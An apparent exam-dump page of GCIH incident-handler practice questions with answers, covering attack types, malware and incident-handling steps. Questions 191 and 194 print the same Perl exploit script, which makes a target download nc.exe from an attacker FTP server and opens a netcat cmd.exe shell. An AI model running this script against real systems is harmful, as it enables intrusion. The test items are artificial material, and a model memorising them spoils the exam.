100% Pass Guaranteed Free GCIH Exam Dumps Sep 16, 2022 [Q177-Q201]


Verified & Latest GCIH Dump Q&As with Correct Answers


How to study the GCIH Exam

There are two main types of resources for preparing for the GCIH certification exam. First, there are study guides and books, which are detailed and suitable for building knowledge from the ground up. Then there are video tutorials and lectures, which can ease the pain of thorough study and are comparatively less boring for some candidates, yet they demand time and concentration from the learner. Smart candidates who want to build a solid foundation in all exam topics and related technologies usually combine video lectures with study guides to reap the benefits of both. There is, however, one crucial preparation tool that most candidates overlook: practice exams. Practice exams are built to make students comfortable with the real exam environment. Statistics have shown that most students fail not because of their preparation but because of exam anxiety, the fear of the unknown. The Exam4PDF expert team recommends that you prepare notes on these topics and also practice the GCIH exam dumps written by our expert team. Both will help you clear this exam with good marks.


GCIH Structure

The GCIH test is the only exam required to obtain the GIAC Certified Incident Handler designation. It is a proctored exam, and candidates must pay a registration fee of $1,999 to be eligible for it. The exam includes 100 to 150 questions of varying complexity and structure. Candidates have only 4 hours to answer as many questions as possible and must reach a passing score of 70%.

 

NEW QUESTION 177
Which of the following attacks allows an attacker to sniff data frames on a local area network (LAN) or stop the traffic altogether?

  • A. Man-in-the-middle
  • B. ARP spoofing
  • C. Session hijacking
  • D. Port scanning

Answer: B

 

NEW QUESTION 178
Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it to chess.exe. The size of chess.exe was 526,895 bytes originally, and after joining this chess file to the Trojan, the file size increased to 651,823 bytes. When he gives you this new game, you install the infected chess.exe file on your computer. He now performs various malicious tasks on your computer remotely. But you suspect that someone has installed a Trojan on your computer and begin to investigate it. When you enter the netstat command in the command prompt, you get the following results:
C:\WINDOWS>netstat -an | find "UDP"
UDP IP_Address:31337 *:*
Now you check the following registry address:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
In the above address, you notice a 'default' key in the 'Name' field having " .exe" value in the corresponding 'Data' field. Which of the following Trojans do you think your friend may have installed on your computer on the basis of the above evidence?

  • A. Tini
  • B. Donald Dick
  • C. Qaz
  • D. Back Orifice

Answer: D

 

NEW QUESTION 179
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data has been stolen.
Adam immediately arrived at the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running processes, RAM, and network connections.
Which of the following steps of the incident handling process is being performed by Adam?

  • A. Eradication
  • B. Containment
  • C. Identification
  • D. Recovery

Answer: B

Explanation:
Section: Volume C

 

NEW QUESTION 180
Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless network of the company. He uses a tool that is a free open-source utility for network exploration. The tool uses raw IP packets to determine the following:
  • What ports are open on our network systems.
  • What hosts are available on the network.
  • Identify unauthorized wireless access points.
  • What services (application name and version) those hosts are offering.
  • What operating systems (and OS versions) they are running.
  • What type of packet filters/firewalls are in use.
Which of the following tools is Victor using?

  • A. Nmap
  • B. Sniffer
  • C. Kismet
  • D. Nessus

Answer: A

 

NEW QUESTION 181
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?

  • A. Malware installation from unknown Web sites
  • B. Mail bombing
  • C. Distributed denial of service (DDOS) attack
  • D. Brute force attack

Answer: A

Explanation:
Section: Volume A

 

NEW QUESTION 182
Which of the following techniques can be used to map 'open' or 'pass through' ports on a gateway?

  • A. Tracefire
  • B. Tracegate
  • C. Traceport
  • D. Traceroute

Answer: D

 

NEW QUESTION 183
Which of the following statements about Denial-of-Service (DoS) attacks are true?
Each correct answer represents a complete solution. Choose three.

  • A. It saturates network resources.
  • B. It disrupts services to a specific computer.
  • C. It changes the configuration of the TCP/IP protocol.
  • D. It disrupts connections between two computers, preventing communications between services.

Answer: A,B,D

 

NEW QUESTION 184
You discover that your network routers are being flooded with broadcast packets that have the return address of one of the servers on your network. This is resulting in an overwhelming amount of traffic going back to that server and flooding it. What is this called?

  • A. Blue jacking
  • B. Syn flood
  • C. IP spoofing
  • D. Smurf attack

Answer: D

 

NEW QUESTION 185
In which of the following attacks does an attacker spoof the source address in IP packets that are sent to the victim?

  • A. DoS
  • B. DDoS
  • C. SQL injection
  • D. Backscatter

Answer: D

 

NEW QUESTION 186
Alice wants to prove her identity to Bob. Bob requests her password as proof of identity, which Alice dutifully provides (possibly after some transformation like a hash function); meanwhile, Eve is eavesdropping on the conversation and keeps the password. After the interchange is over, Eve connects to Bob posing as Alice; when asked for a proof of identity, Eve sends Alice's password read from the last session, which Bob accepts. Which of the following attacks is being used by Eve?

  • A. Replay
  • B. Cross site scripting
  • C. Session fixation
  • D. Firewalking

Answer: A

 

NEW QUESTION 187
Which of the following attacks can be overcome by applying cryptography?

  • A. Buffer overflow
  • B. DoS
  • C. Web ripping
  • D. Sniffing

Answer: D

 

NEW QUESTION 188
Jane works as a Consumer Support Technician for ABC Inc. The company provides troubleshooting support to users. Jane is troubleshooting the computer of a user who has installed software that automatically gains full permissions on his computer. Jane has never seen this software before. Which of the following types of malware is the user facing on his computer?

  • A. Adware
  • B. Rootkits
  • C. Viruses
  • D. Spyware

Answer: B

 

NEW QUESTION 189
Which of the following penetration testing phases involves reconnaissance or data gathering?

  • A. Post-attack phase
  • B. Attack phase
  • C. Out-attack phase
  • D. Pre-attack phase

Answer: D

Explanation:
Section: Volume B

 

NEW QUESTION 190
Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about programs like Hping2 that can get into a network through covert channels.
Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

  • A. Block ICMP type 3 messages
  • B. Block all outgoing traffic on port 21
  • C. Block ICMP type 13 messages
  • D. Block all outgoing traffic on port 53

Answer: C

Explanation:
Section: Volume A

 

NEW QUESTION 191
Adam, a malicious hacker, performs an exploit, which is given below:
#####################################################
$port = 53; # Spawn cmd.exe on port X
$your = "192.168.1.1"; # Your FTP Server 89
$user = "Anonymous"; # login as
$pass = '[email protected]'; # password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?

  • A. Opens up a SMTP server that requires no username or password
  • B. Opens up a telnet listener that requires no username or password
  • C. Creates a share called "sasfile" on the target system
  • D. Creates an FTP server with write permissions enabled

Answer: B

 

NEW QUESTION 192
Which of the following are the primary goals of the incident handling team?
Each correct answer represents a complete solution. Choose all that apply.

  • A. Prevent any further damage.
  • B. Freeze the scene.
  • C. Inform higher authorities.
  • D. Repair any damage caused by an incident.

Answer: A,B,D

 

NEW QUESTION 193
Which of the following systems is used in the United States to coordinate emergency preparedness and incident management among various federal, state, and local agencies?

  • A. National Disaster Management System (NDMS)
  • B. National Emergency Management System (NEMS)
  • C. US Incident Management System (USIMS)
  • D. National Incident Management System (NIMS)

Answer: D

 

NEW QUESTION 194
Adam, a malicious hacker, performs an exploit, which is given below:
#####################################################
$port = 53;
# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server 89
$user = "Anonymous";# login as
$pass = '[email protected]';# password
#####################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (Have a ftp server)\n";
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port");
exit(0);
Which of the following is the expected result of the above exploit?

  • A. Opens up a SMTP server that requires no username or password
  • B. Opens up a telnet listener that requires no username or password
  • C. Creates a share called "sasfile" on the target system
  • D. Creates an FTP server with write permissions enabled

Answer: B

 

NEW QUESTION 195
Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?
Each correct answer represents a complete solution. Choose all that apply.

  • A. nmap
  • B. portsentry
  • C. libnids
  • D. scanlogd

Answer: B,C,D

Explanation:
Section: Volume B

 

NEW QUESTION 196
Which of the following statements about threats are true?
Each correct answer represents a complete solution. Choose all that apply.

  • A. A threat is any circumstance or event with the potential of causing harm to a system in the form of destruction, disclosure, modification of data, or denial of service.
  • B. A threat is a sequence of circumstances and events that allows a human or other agent to cause an information-related misfortune by exploiting vulnerability in an IT product.
  • C. A threat is a weakness or lack of safeguard that can be exploited by vulnerability, thus causing harm to the information systems or networks.
  • D. A threat is a potential for violation of security which exists when there is a circumstance, capability, action, or event that could breach security and cause harm.

Answer: A,B,D

 

NEW QUESTION 197
Which of the following types of attacks slows down or stops a server by overloading it with requests?

  • A. Impersonation attack
  • B. Vulnerability attack
  • C. Network attack
  • D. DoS attack

Answer: D

Explanation:
Section: Volume C

 

NEW QUESTION 198
In which of the following scanning methods do Windows operating systems send only RST packets irrespective of whether the port is open or closed?

  • A. XMAS
  • B. TCP FIN
  • C. TCP SYN
  • D. FTP bounce

Answer: B

Explanation:
Section: Volume A

 

NEW QUESTION 199
John works as a Network Administrator for Net Perfect Inc. The company has a Windows-based network. The company uses Check Point SmartDefense to provide security to the network of the company. On the HTTP servers of the company, John defines a rule for dropping any kind of user-defined URLs. Which of the following types of attacks can be prevented by dropping the user-defined URLs?

  • A. Hybrid attacks
  • B. PTC worms and mutations
  • C. Morris worm
  • D. Code red worm

Answer: B

 

NEW QUESTION 200
Which of the following viruses is a script that attaches itself to a file or template?

  • A. E-mail virus
  • B. Macro virus
  • C. Boot sector
  • D. Trojan horse

Answer: B

 

NEW QUESTION 201
......
